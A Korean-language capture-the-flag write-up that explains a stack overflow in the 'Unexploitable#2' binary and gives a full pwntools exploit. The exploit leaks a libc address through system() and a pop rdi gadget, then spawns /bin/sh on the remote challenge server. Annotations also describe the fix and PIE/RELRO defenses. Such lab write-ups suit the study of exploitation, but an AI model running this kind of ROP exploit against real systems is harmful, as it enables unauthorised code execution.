Hackctf Unexploitable#2 Writeup

LeeDoHyun · April 8, 2020

문제를 풀려고 보니 puts, write, read가 없어서 평소에 릭하던 대로 하지 못했습니다.

삽질 도중에 system 함수로 메모리 릭이 가능하다는 것을 알았습니다.

/*
 * Decompiler (IDA-style) pseudocode of the challenge binary's main().
 * `_bss_start` is the decompiler's label for the FILE* used for output --
 * presumably stdout, but that is not confirmed by this listing.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+0h] [rbp-10h]  -- shown as a 1-byte variable, but the slot is 0x10 bytes below the saved rbp

  setvbuf(_bss_start, 0LL, 2, 0LL);  /* mode 2 is _IONBF on glibc: unbuffered */
  setvbuf(stdin, 0LL, 2, 0LL);
  /* NOTE(review): "[email protected]" looks like an e-mail-obfuscation artifact of the
   * page rather than the binary's text -- the literal shown is 52 bytes, while the
   * call writes 0x30 (48) bytes. */
  fwrite("Hard RTL ha? You don't even have [email protected]!\n", 1uLL, 0x30uLL, _bss_start);
  /* Defect: fgets() reads up to 63 bytes plus a terminator into a 16-byte stack
   * slot ([rbp-10h]), so input past 16 bytes overwrites the saved rbp and the
   * return address (stack buffer overflow). The fix is to bound the read by the
   * buffer's real size, e.g. fgets(s, sizeof s, stdin), and/or enlarge the buffer. */
  fgets(&s, 64, stdin);
  return 0;
}

system 함수로 fgets를 릭해 준 뒤 pop rdi 가젯으로 system 함수를 써주면 됩니다.

ex.py

from pwn import *

#context.log_level = "debug"
# Writeup's exploit script for the fgets() overflow shown in the listing above.
# Python 2 pwntools: str and bytes are concatenated freely and `.next()` (Python 2
# iterator method) is used; under Python 3 the literals would need to be bytes
# and `next(...)` used instead.
# Defender note: every fixed address here (`pr`, the PLT/GOT entries, `main`)
# depends on the binary being non-PIE, and the leak depends on the GOT being
# readable; PIE plus Full RELRO, and a correctly bounded fgets(), remove what
# this script relies on.
IP = "ctf.j0n9hyun.xyz"
PORT = "3029"
r = remote(IP, PORT)
#r = process("./Unexploitable_2")
e = ELF("./Unexploitable_2")
libc = e.libc  # pwntools' guess at the matching libc -- NOTE(review): confirm it is the remote's libc, the offsets below assume so

pr = 0x400773  # hard-coded gadget address; per the text above a `pop rdi` gadget -- TODO confirm against the binary
fgets_got = e.got["fgets"]      # GOT slot of fgets (already resolved: fgets ran before the overflowed return)
system_plt = e.plt["system"]    # PLT stub of system, which the binary imports
main = e.symbols["main"]        # returned to after the first chain so the program runs again

# Prompt string as it appears on the page; "[email protected]" looks like an
# e-mail-obfuscation artifact, not the binary's real text (see listing above).
r.recvuntil("Hard RTL ha? You don't even have [email protected]!")
payload = "A"*(0x10 + 0x8)      # 0x10 = buffer at rbp-0x10 in the listing, + 8 bytes of saved rbp
payload += p64(pr)
payload += p64(fgets_got)
payload += p64(system_plt)
payload += p64(main)
r.sendline(payload)

# NOTE: the name says "fwrite" but the value is the fgets GOT entry; the base is
# computed from libc's fgets offset accordingly (the log message below is
# therefore misleading).
fwrite_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")  # 6 low bytes of an x86-64 user pointer, zero-padded to 8
base = fwrite_leak - libc.symbols["fgets"]
binsh = base + libc.search("/bin/sh").next()  # Python 2 iterator protocol

info("fwrite leak = " + hex(fwrite_leak))
info("base addr = " + hex(base))
info("binsh addr = " + hex(binsh))

# Second run of main(): same overflow, now with the leaked addresses.
r.recvuntil("Hard RTL ha? You don't even have [email protected]!")
payload = "A"*(0x10 + 0x8)
payload += p64(pr)
payload += p64(binsh)
payload += p64(system_plt)
r.sendline(payload)
r.interactive()
